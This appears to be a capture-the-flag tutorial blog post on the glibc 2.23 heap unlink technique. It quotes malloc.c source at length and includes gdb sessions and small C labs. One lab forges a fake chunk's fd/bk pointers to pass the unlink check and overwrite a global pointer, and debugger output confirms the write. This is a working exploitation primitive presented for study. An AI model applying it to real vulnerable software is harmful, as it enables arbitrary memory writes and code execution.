[Original] PWN Heap unlink

Posted on 2024-10-15 18:19

A glibc chunk consists of the following fields:

prev_size: records the size of the previous chunk (only meaningful when the previous chunk is free)

size: records the size of the current chunk; its lowest bits hold the A/M/P flag bits (NON_MAIN_ARENA, IS_MMAPPED, PREV_INUSE)

fd and bk: two pointers; once a chunk has been freed and is managed by a bin, they form the links of that bin's list

fd/bk, user_data, and the next chunk's prev_size: after the chunk is allocated, all of this space is used to store the user's data
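
For reference, this is the chunk header definition from malloc.c in glibc 2.23:

struct malloc_chunk {
  INTERNAL_SIZE_T      prev_size;  /* Size of previous chunk (if free).  */
  INTERNAL_SIZE_T      size;       /* Size in bytes, including overhead. */
  struct malloc_chunk* fd;         /* double links -- used only if free. */
  struct malloc_chunk* bk;
  /* Only used for large blocks: pointer to next larger size.  */
  struct malloc_chunk* fd_nextsize;
  struct malloc_chunk* bk_nextsize;
};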


First, use gdb to dynamically inspect the structure of main_arena.

Next, a quick tour of main_arena and the parts of it that matter most for this challenge (the relevant glibc definitions are reproduced in the listings below):

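A minimal way to reproduce that inspection in gdb/pwndbg, assuming libc debug symbols are installed (addresses will differ per run):

pwndbg> p &main_arena
pwndbg> p main_arena
pwndbg> x/40gx &main_arena
pwndbg> bins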

Next, we read the glibc source to describe the unlink process, and then look closely at the checks unlink performs.

On the Index of /gnu/glibc site, find glibc 2.23; after downloading and extracting it, open malloc.c in the glibc-2.23/malloc directory and search for unlink. The macro definition found there is the concrete unlink procedure.
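
A sketch of those steps on the command line (the tarball name is as published on that index page):

wget https://ftp.gnu.org/gnu/glibc/glibc-2.23.tar.gz
tar xzf glibc-2.23.tar.gz
grep -n "unlink(AV, P, BK, FD)" glibc-2.23/malloc/malloc.c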


In other words, before taking a chunk P off the list, unlink first verifies that the neighboring entries still point back at P, i.e. that FD->bk and BK->fd both equal P. This protects the doubly linked list from corruption: a tampered bk pointer in FD, or a tampered fd pointer in BK, is detected.

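The check in question, quoted from the unlink macro in glibc 2.23:

if (__builtin_expect (FD->bk != P || BK->fd != P, 0))
  malloc_printerr (check_action, "corrupted double-linked list", P, AV);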

Use the heap -v command to inspect the chunks; at this point none of them has been modified yet.

Then use the ni command to step the program forward to the statement just before the free call.


Next, let's analyze the concrete unlink process; first, the preconditions an unlink attack requires.

The preparation for the forged chunk (using the addresses obtained in the first analysis above) is as follows.

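The net effect can be summarized as follows: a sketch of the classic glibc 2.23 unlink primitive, assuming a writable global pointer ptr that can be made to point at the fake chunk P:

/* P->fd = (char *)&ptr - 0x18;   then FD->bk == ptr == P, check passes
 * P->bk = (char *)&ptr - 0x10;   then BK->fd == ptr == P, check passes
 *
 * unlink then executes:
 *   FD->bk = BK;   i.e. ptr = (char *)&ptr - 0x10
 *   BK->fd = FD;   i.e. ptr = (char *)&ptr - 0x18   (this write lands last)
 *
 * Result: ptr ends up pointing 0x18 bytes before itself, and writing
 * through ptr afterwards can overwrite ptr again with a chosen address.
 */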

We know the program allocates 0x10 bytes right at startup, but that chunk serves no purpose here.

We need to allocate three chunks; size the first and second so that, once freed, they land in the unsortedbin list.

The third can be any chunk at all (it exists so that when the second chunk is freed and merges with the first, the result is not further consolidated into the top chunk).

Then use the change function to overflow the heap; conveniently, a pointer to the first chunk already exists (itemlist[0].name).

Verify with gdb: allocate one chunk, then run x/20gx 0x6020C0 to dump the struct array; the name pointer turns out to live at 0x6020c0+0x8.
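
That offset suggests a layout roughly like the following (only itemlist and name come from the challenge; the first field and the array length are my guesses, not taken from the binary):

struct item {
    long  size;     /* assumption: the 8 bytes at offset 0x0 of each entry */
    char *name;     /* heap pointer observed at offset 0x8, i.e. 0x6020c8 */
};

struct item itemlist[16];   /* assumed length; array base observed at 0x6020C0 */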


0x10 ---> 0001 0000
0x18 ---> 0001 1000
0x20 ---> 0010 0000

In each case the low three bits are zero; because chunk sizes are always aligned, malloc can reuse those bits for the A (NON_MAIN_ARENA), M (IS_MMAPPED), and P (PREV_INUSE) flags.
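For reference, this is how glibc 2.23 rounds a request up to a usable chunk size (request2size in malloc.c):

#define request2size(req)                                         \
  (((req) + SIZE_SZ + MALLOC_ALIGN_MASK < MINSIZE)  ?             \
   MINSIZE :                                                      \
   ((req) + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK)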
struct malloc_state
{
  /* Serialize access.  */
  mutex_t mutex;
 
  /* Flags (formerly in max_fast).  */
  int flags;
 
  /* Fastbins */
  mfastbinptr fastbinsY[NFASTBINS];
 
  /* Base of the topmost chunk -- not otherwise kept in a bin */
  mchunkptr top;
 
  /* The remainder from the most recent split of a small request */
  mchunkptr last_remainder;
 
  /* Normal bins packed as described above */
  mchunkptr bins[NBINS * 2 - 2];
 
  /* Bitmap of bins */
  unsigned int binmap[BINMAPSIZE];
 
  /* Linked list */
  struct malloc_state *next;
 
  /* Linked list for free arenas.  Access to this field is serialized
     by free_list_lock in arena.c.  */
  struct malloc_state *next_free;
 
  /* Number of threads attached to this arena.  0 if the arena is on
     the free list.  Access to this field is serialized by
     free_list_lock in arena.c.  */
  INTERNAL_SIZE_T attached_threads;
 
  /* Memory allocated from the system in this arena.  */
  INTERNAL_SIZE_T system_mem;
  INTERNAL_SIZE_T max_system_mem;
};
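The bins array is accessed through the bin_at macro (also glibc 2.23); note the backwards offset by the fd field, which makes each bin header act like a chunk whose fd/bk overlay the array:

typedef struct malloc_chunk *mbinptr;

#define bin_at(m, i) \
  (mbinptr) (((char *) &((m)->bins[((i) - 1) * 2]))               \
             - offsetof (struct malloc_chunk, fd))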
static struct malloc_state main_arena =
{
  .mutex = _LIBC_LOCK_INITIALIZER,
  .next = &main_arena,
  .attached_threads = 1
};
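Only these three fields are set statically; the rest (bins, top, flags) are filled in by malloc_init_state on the first allocation. Its bin setup explains why every empty bin in a main_arena dump appears to point at itself (from glibc 2.23):

  for (i = 1; i < NBINS; ++i)
    {
      bin = bin_at (av, i);
      bin->fd = bin->bk = bin;
    }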
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <unistd.h>
 
long long int a[100];
 
int main() {
    long long int *p1 = malloc(0x100);
    long long int *pp = malloc(0x100);   // spacer so p1 and p2 are not adjacent
    long long int *p2 = malloc(0x100);
    long long int *p3 = malloc(0x100);
    free(p1);   // 0x110 chunk -> unsortedbin
    free(p2);   // next chunk (p3) is in use, so p2 joins unsortedbin too
    free(p3);   // prev chunk (p2) is free: unlink(p2) fires, merged chunk melts into top
    return 0;
}
# gcc -o unlink_64 unlink_64.c -fno-stack-protector -z execstack
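One way to watch the unlink happen under pwndbg (standard commands; output omitted):

gdb ./unlink_64
pwndbg> b free
pwndbg> r            # stops entering free(p1)
pwndbg> c            # stops entering free(p2)
pwndbg> c            # stops entering free(p3)
pwndbg> bins         # p1 and p2 should sit in unsortedbin
pwndbg> finish       # let free(p3) run: unlink(p2) executes
pwndbg> bins         # only p1 left; p2+p3 merged into top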
#include<stdio.h>
#include<stdlib.h>
#include<stdint.h>
#include<string.h>
#include<unistd.h>
long long int a[100];
int main(){
        long long int *p1 = malloc(0x100);
        long long int *pp = malloc(0x100);
        long long int *p2 = malloc(0x100);
        long long int *p3 = malloc(0x100);
        long long int *p4 = malloc(0x100);
        free(p1);   // -> unsortedbin
        free(p2);   // -> unsortedbin (p3 still in use)
        free(p3);   // prev (p2) is free: unlink(p2), merged 0x220 chunk -> unsortedbin
        free(p4);   // prev is free: unlink the merged chunk, then everything melts into top
        return 0;
}
// gcc -o lab_3 lab_3.c -fno-stack-protector -z execstack
/* Take a chunk off a bin list */
#define unlink(AV, P, BK, FD) {                                               \
    FD = P->fd;                                                               \
    BK = P->bk;                                                               \
    if (__builtin_expect (FD->bk != P || BK->fd != P, 0))                     \
      malloc_printerr (check_action, "corrupted double-linked list", P, AV);  \
    else {                                                                    \
        FD->bk = BK;                                                          \
        BK->fd = FD;                                                          \
        if (!in_smallbin_range (P->size)                                      \
            && __builtin_expect (P->fd_nextsize != NULL, 0)) {                \
            if (__builtin_expect (P->fd_nextsize->bk_nextsize != P, 0)        \
                || __builtin_expect (P->bk_nextsize->fd_nextsize != P, 0))    \
              malloc_printerr (check_action,                                  \
                               "corrupted double-linked list (not small)",    \
                               P, AV);                                        \
            if (FD->fd_nextsize == NULL) {                                    \
                if (P->fd_nextsize == P)                                      \
                  FD->fd_nextsize = FD->bk_nextsize = FD;                     \
                else {                                                        \
                    FD->fd_nextsize = P->fd_nextsize;                         \
                    FD->bk_nextsize = P->bk_nextsize;                         \
                    P->fd_nextsize->bk_nextsize = FD;                         \
                    P->bk_nextsize->fd_nextsize = FD;                         \
                  }                                                           \
              }                                                               \
            else {                                                            \
                P->fd_nextsize->bk_nextsize = P->bk_nextsize;                 \
                P->bk_nextsize->fd_nextsize = P->fd_nextsize;                 \
              }                                                               \
          }                                                                   \
      }                                                                       \
}
Step by step: the macro first loads P's forward and backward neighbors:

FD = P->fd
BK = P->bk

Then comes the integrity check: both neighbors must still point back at P:

if (__builtin_expect (FD->bk != P || BK->fd != P, 0))
   malloc_printerr (check_action, "corrupted double-linked list", P, AV);

Only when the check passes does the macro perform the actual unlink writes:

FD->bk = BK;
BK->fd = FD;
In _int_free, unlink is reached on the two consolidation paths:

/* consolidate backward: merge with the previous (lower-address) chunk */
if (!prev_inuse(p)) {
  prevsize = p->prev_size;
  size += prevsize;
  p = chunk_at_offset(p, -((long) prevsize));
  unlink(av, p, bck, fwd);
}

if (nextchunk != av->top) {
  /* get and clear inuse bit */
  nextinuse = inuse_bit_at_offset(nextchunk, nextsize);

  /* consolidate forward: merge with the next (higher-address) chunk */
  if (!nextinuse) {
    unlink(av, nextchunk, bck, fwd);
    size += nextsize;
  } else
    clear_inuse_bit_at_offset(nextchunk, 0);
  /* ... the merged chunk is then placed in the unsorted bin ... */
malloc_consolidate flushes the fastbins using the same consolidation logic, so it reaches unlink as well:

static void malloc_consolidate(mstate av)
{
  mfastbinptr*    fb;                 /* current fastbin being consolidated */
  mfastbinptr*    maxfb;              /* last fastbin (for loop control) */
  mchunkptr       p;                  /* current chunk being consolidated */
  mchunkptr       nextp;              /* next chunk to consolidate */
  mchunkptr       unsorted_bin;       /* bin header */
  mchunkptr       first_unsorted;     /* chunk to link to */
 
  /* These have same use as in free() */
  mchunkptr       nextchunk;
  INTERNAL_SIZE_T size;
  INTERNAL_SIZE_T nextsize;
  INTERNAL_SIZE_T prevsize;
  int             nextinuse;
  mchunkptr       bck;
  mchunkptr       fwd;
 
  /*
    If max_fast is 0, we know that av hasn't
    yet been initialized, in which case do so below
  */
 
  if (get_max_fast () != 0) {
    clear_fastchunks(av);
 
    unsorted_bin = unsorted_chunks(av);
 
    /*
      Remove each chunk from fast bin and consolidate it, placing it
      then in unsorted bin. Among other reasons for doing this,
      placing in unsorted bin avoids needing to calculate actual bins
      until malloc is sure that chunks aren't immediately going to be
      reused anyway.
    */
 
    maxfb = &fastbin (av, NFASTBINS - 1);
    fb = &fastbin (av, 0);
    do {
      p = atomic_exchange_acq (fb, 0);
      if (p != 0) {
    do {
      check_inuse_chunk(av, p);
      nextp = p->fd;
 
      /* Slightly streamlined version of consolidation code in free() */
      size = p->size & ~(PREV_INUSE|NON_MAIN_ARENA);
      nextchunk = chunk_at_offset(p, size);
      nextsize = chunksize(nextchunk);
 
      if (!prev_inuse(p)) {
        prevsize = p->prev_size;
        size += prevsize;
        p = chunk_at_offset(p, -((long) prevsize));
        unlink(av, p, bck, fwd);
      }
 
      if (nextchunk != av->top) {
        nextinuse = inuse_bit_at_offset(nextchunk, nextsize);
 
        if (!nextinuse) {
          size += nextsize;
          unlink(av, nextchunk, bck, fwd);
        } else
          clear_inuse_bit_at_offset(nextchunk, 0);
 
        first_unsorted = unsorted_bin->fd;
        unsorted_bin->fd = p;
        first_unsorted->bk = p;
 
        if (!in_smallbin_range (size)) {
          p->fd_nextsize = NULL;
          p->bk_nextsize = NULL;
        }
 
        set_head(p, size | PREV_INUSE);
        p->bk = unsorted_bin;
        p->fd = first_unsorted;
        set_foot(p, size);
      }
 
      else {
        size += nextsize;
        set_head(p, size | PREV_INUSE);
        av->top = p;
      }
 
    } while ( (p = nextp) != 0);
 
      }
    } while (fb++ != maxfb);
  }
  else {
    malloc_init_state(av);
    check_malloc_state(av);
  }
}
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <unistd.h>
 
long long unsigned int* a[100];
 
int main()
{
    long long unsigned int *p1, *p2, *p3, target;

    target = (long long unsigned int)&a[5];  // target address (for the arbitrary write)
    printf("target:%p\n%p\n%p\n", (void *)target,
           (void *)(target - 0x18), (void *)(target - 0x10));
    a[0] = (void*)0x0;
    a[1] = (void*)0x110;
    // allocate the chunks
    malloc(0x20);
    p1 = malloc(0x100);
    p2 = malloc(0x100);
    p3 = malloc(0x100);
    a[5] = p1;
    printf("beforefree:a[5]: %p\n", a[5]);
    printf("p1: %p\n", p1);
    // forge the fake chunk's metadata at p1
    p1[0] = 0x0;   // prev_size
    p1[1] = 0x101; // size

    // forge fd and bk so the fake chunk passes the double-linked-list check
    p1[2] = (long long unsigned int)(target - 0x18);  // fd: FD->bk aliases &a[5]
    p1[3] = (long long unsigned int)(target - 0x10);  // bk: BK->fd aliases &a[5]
    // read(0,p1+0x20,0x90);
    // adjust p2's chunk metadata to what the allocator expects:
    // prev_size reaches back to the fake chunk, PREV_INUSE bit cleared
    p2[-2] = 0x100;  // prev_size
    p2[-1] = 0x110;  // size (P bit clear, so backward consolidation triggers)

    // free p2, triggering the unlink on the fake chunk
    free(p2);
    // check whether the target address was overwritten
    printf("afterfree:a[5]: %p\n", a[5]);
    return 0;
}
//  gcc -o lab_7 lab_7.c -fno-stack-protector -z execstack -z norelro -fno-builtin
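
Why a[5] changes, as I read the lab against the glibc 2.23 unlink macro:

/* FD = P->fd = target - 0x18   =>  FD->bk sits at target, i.e. &a[5]
 * BK = P->bk = target - 0x10   =>  BK->fd sits at target, i.e. &a[5]
 * check: FD->bk == P and BK->fd == P both hold, because a[5] == p1 == P
 * writes: FD->bk = BK; then BK->fd = FD; the second write wins,
 *         so afterfree a[5] == target - 0x18, i.e. 0x18 bytes before &a[5]
 */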
In the compiled libc, the check shows up as a conditional branch (pwndbg disassembly):

0x7f3ac4ad8fe0 <_int_free+640>   ✔ jne    _int_free+2048                <_int_free+2048>
pwndbg> x/20gx 0x600b10-0x20
0x600af0:       0x0000000000000000      0x0000000000000000
0x600b00 <a>:   0x0000000000000000      0x0000000000000000
0x600b10 <a+16>:        0x0000000000000000      0x0000000000000000
0x600b20 <a+32>:        0x0000000000000000      0x0000000000600b10
0x600b30 <a+48>:        0x0000000000000000      0x0000000000000000
0x600b40 <a+64>:        0x0000000000000000      0x0000000000000000
0x600b50 <a+80>:        0x0000000000000000      0x0000000000000000
0x600b60 <a+96>:        0x0000000000000000      0x0000000000000000
0x600b70 <a+112>:       0x0000000000000000      0x0000000000000000
0x600b80 <a+128>:       0x0000000000000000      0x0000000000000000
pwndbg> unsorted
unsortedbin
empty

Note that the qword at 0x600b28 (a[5]) holds 0x600b10, which is exactly 0x600b28 - 0x18, the value the unlink write is expected to leave behind.
The check and the two unlink writes in the compiled _int_free (pwndbg disassembly), followed by the bin state:

   0x7f18ae011f71 <_int_free+529>     cmp    rbx, qword ptr [rdx + 0x10]
   0x7f18ae011f75 <_int_free+533>     jne    _int_free+3034                <_int_free+3034>

   0x7f18ae011f7b <_int_free+539>     cmp    qword ptr [rbx + 8], 0x3ff
   0x7f18ae011f83 <_int_free+547>     mov    qword ptr [rax + 0x18], rdx
 0x7f18ae011f87 <_int_free+551>     mov    qword ptr [rdx + 0x10], rax
   0x7f18ae011f8b <_int_free+555>     jbe    _int_free+624                <_int_free+624>

pwndbg> bins
fastbins
empty
unsortedbin
empty
smallbins
empty
largebins
empty
Walking through the macro with the lab's values:

FD = P->fd
BK = P->bk
// At the call site, P is the chunk freed via p2.
// Because this is backward consolidation, P is updated to point at
// fake_chunk before unlink is invoked, so inside unlink P is fake_chunk.

if (__builtin_expect (FD->bk != P || BK->fd != P, 0))
      malloc_printerr (check_action, "corrupted double-linked list", P, AV);

FD->bk = BK;
BK->fd = FD;
For completeness, the full _int_free from glibc 2.23:

static void
_int_free (mstate av, mchunkptr p, int have_lock)
{
  INTERNAL_SIZE_T size;        /* its size */
  mfastbinptr *fb;             /* associated fastbin */
  mchunkptr nextchunk;         /* next contiguous chunk */
  INTERNAL_SIZE_T nextsize;    /* its size */
  int nextinuse;               /* true if nextchunk is used */
  INTERNAL_SIZE_T prevsize;    /* size of previous contiguous chunk */
  mchunkptr bck;               /* misc temp for linking */
  mchunkptr fwd;               /* misc temp for linking */
 
  const char *errstr = NULL;
  int locked = 0;
 
  size = chunksize (p);
 
  /* Little security check which won't hurt performance: the
     allocator never wrapps around at the end of the address space.
     Therefore we can exclude some size values which might appear
     here by accident or by "design" from some intruder.  */
  if (__builtin_expect ((uintptr_t) p > (uintptr_t) -size, 0)
      || __builtin_expect (misaligned_chunk (p), 0))
    {
      errstr = "free(): invalid pointer";
    errout:
      if (!have_lock && locked)
        (void) mutex_unlock (&av->mutex);
      malloc_printerr (check_action, errstr, chunk2mem (p), av);
      return;
    }
  /* We know that each chunk is at least MINSIZE bytes in size or a
     multiple of MALLOC_ALIGNMENT.  */
  if (__glibc_unlikely (size < MINSIZE || !aligned_OK (size)))
    {
      errstr = "free(): invalid size";
      goto errout;
    }
 
  check_inuse_chunk(av, p);
 
  /*
    If eligible, place chunk on a fastbin so it can be found
    and used quickly in malloc.
  */
 
  if ((unsigned long)(size) <= (unsigned long)(get_max_fast ())
 
#if TRIM_FASTBINS
      /*
    If TRIM_FASTBINS set, don't place chunks
    bordering top into fastbins
      */
      && (chunk_at_offset(p, size) != av->top)
#endif
      ) {
 
    if (__builtin_expect (chunk_at_offset (p, size)->size <= 2 * SIZE_SZ, 0)
    || __builtin_expect (chunksize (chunk_at_offset (p, size))
                 >= av->system_mem, 0))
      {
    /* We might not have a lock at this point and concurrent modifications
       of system_mem might have let to a false positive.  Redo the test
       after getting the lock.  */
    if (have_lock
        || ({ assert (locked == 0);
          mutex_lock(&av->mutex);
          locked = 1;
          chunk_at_offset (p, size)->size <= 2 * SIZE_SZ
            || chunksize (chunk_at_offset (p, size)) >= av->system_mem;
          }))
      {
        errstr = "free(): invalid next size (fast)";
        goto errout;
      }
    if (! have_lock)
      {
        (void)mutex_unlock(&av->mutex);
        locked = 0;
      }
      }
 
    free_perturb (chunk2mem(p), size - 2 * SIZE_SZ);
 
    set_fastchunks(av);
    unsigned int idx = fastbin_index(size);
    fb = &fastbin (av, idx);
 
    /* Atomically link P to its fastbin: P->FD = *FB; *FB = P;  */
    mchunkptr old = *fb, old2;
    unsigned int old_idx = ~0u;
    do
      {
    /* Check that the top of the bin is not the record we are going to add
       (i.e., double free).  */
    if (__builtin_expect (old == p, 0))
      {
        errstr = "double free or corruption (fasttop)";
        goto errout;
      }
    /* Check that size of fastbin chunk at the top is the same as
       size of the chunk that we are adding.  We can dereference OLD
       only if we have the lock, otherwise it might have already been
       deallocated.  See use of OLD_IDX below for the actual check.  */
    if (have_lock && old != NULL)
      old_idx = fastbin_index(chunksize(old));
    p->fd = old2 = old;
      }
    while ((old = catomic_compare_and_exchange_val_rel (fb, p, old2)) != old2);
 
    if (have_lock && old != NULL && __builtin_expect (old_idx != idx, 0))
      {
    errstr = "invalid fastbin entry (free)";
    goto errout;
      }
  }
 
  /*
    Consolidate other non-mmapped chunks as they arrive.
  */
 
  else if (!chunk_is_mmapped(p)) {
    if (! have_lock) {
      (void)mutex_lock(&av->mutex);
      locked = 1;
    }
 
    nextchunk = chunk_at_offset(p, size);
 
    /* Lightweight tests: check whether the block is already the
       top block.  */
    if (__glibc_unlikely (p == av->top))
      {
    errstr = "double free or corruption (top)";
    goto errout;
      }
    /* Or whether the next chunk is beyond the boundaries of the arena.  */
    if (__builtin_expect (contiguous (av)
              && (char *) nextchunk
              >= ((char *) av->top + chunksize(av->top)), 0))
      {
    errstr = "double free or corruption (out)";
    goto errout;
      }
    /* Or whether the block is actually not marked used.  */
    if (__glibc_unlikely (!prev_inuse(nextchunk)))
      {
    errstr = "double free or corruption (!prev)";
    goto errout;
      }
 
    nextsize = chunksize(nextchunk);
    if (__builtin_expect (nextchunk->size <= 2 * SIZE_SZ, 0)
    || __builtin_expect (nextsize >= av->system_mem, 0))
      {
    errstr = "free(): invalid next size (normal)";
    goto errout;
      }
 
    free_perturb (chunk2mem(p), size - 2 * SIZE_SZ);
 
    /* consolidate backward */
    if (!prev_inuse(p)) {
      prevsize = p->prev_size;
      size += prevsize;
      p = chunk_at_offset(p, -((long) prevsize));
      unlink(av, p, bck, fwd);
    }
 
    if (nextchunk != av->top) {
      /* get and clear inuse bit */
      nextinuse = inuse_bit_at_offset(nextchunk, nextsize);
 
      /* consolidate forward */
      if (!nextinuse) {
    unlink(av, nextchunk, bck, fwd);
    size += nextsize;
      } else
    clear_inuse_bit_at_offset(nextchunk, 0);
 
      /*
    Place the chunk in unsorted chunk list. Chunks are
    not placed into regular bins until after they have
    been given one chance to be used in malloc.
      */
 
      bck = unsorted_chunks(av);
      fwd = bck->fd;
      if (__glibc_unlikely (fwd->bk != bck))
    {
      errstr = "free(): corrupted unsorted chunks";
      goto errout;
    }
      p->fd = fwd;
      p->bk = bck;
      if (!in_smallbin_range(size))
    {
      p->fd_nextsize = NULL;
      p->bk_nextsize = NULL;
    }
      bck->fd = p;
      fwd->bk = p;
 
      set_head(p, size | PREV_INUSE);
      set_foot(p, size);
 
      check_free_chunk(av, p);
    }
 
    /*
      If the chunk borders the current high end of memory,
      consolidate into top
    */
 
    else {
      size += nextsize;
      set_head(p, size | PREV_INUSE);
      av->top = p;
      check_chunk(av, p);
    }
 
    /*
      If freeing a large space, consolidate possibly-surrounding
      chunks. Then, if the total unused topmost memory exceeds trim
      threshold, ask malloc_trim to reduce top.
 
      Unless max_fast is 0, we don't know if there are fastbins
      bordering top, so we cannot tell for sure whether threshold
      has been reached unless fastbins are consolidated.  But we
      don't want to consolidate on each free.  As a compromise,
      consolidation is performed if FASTBIN_CONSOLIDATION_THRESHOLD
      is reached.
    */
 
    if ((unsigned long)(size) >= FASTBIN_CONSOLIDATION_THRESHOLD) {
      if (have_fastchunks(av))
    malloc_consolidate(av);
 
      if (av == &main_arena) {
#ifndef MORECORE_CANNOT_TRIM
    if ((unsigned long)(chunksize(av->top)) >=
        (unsigned long)(mp_.trim_threshold))
      systrim(mp_.top_pad, av);
#endif
      } else {
    /* Always try heap_trim(), even if the top chunk is not
       large, because the corresponding heap might go away.  */
    heap_info *heap = heap_for_ptr(top(av));
 
    assert(heap->ar_ptr == av);
    heap_trim(heap, mp_.top_pad);
      }
    }
 
    if (! have_lock) {
      assert (locked);
      (void)mutex_unlock(&av->mutex);
    }
  }
  /*
    If the chunk was allocated via mmap, release via munmap().
  */
 
  else {
    munmap_chunk (p);
  }
}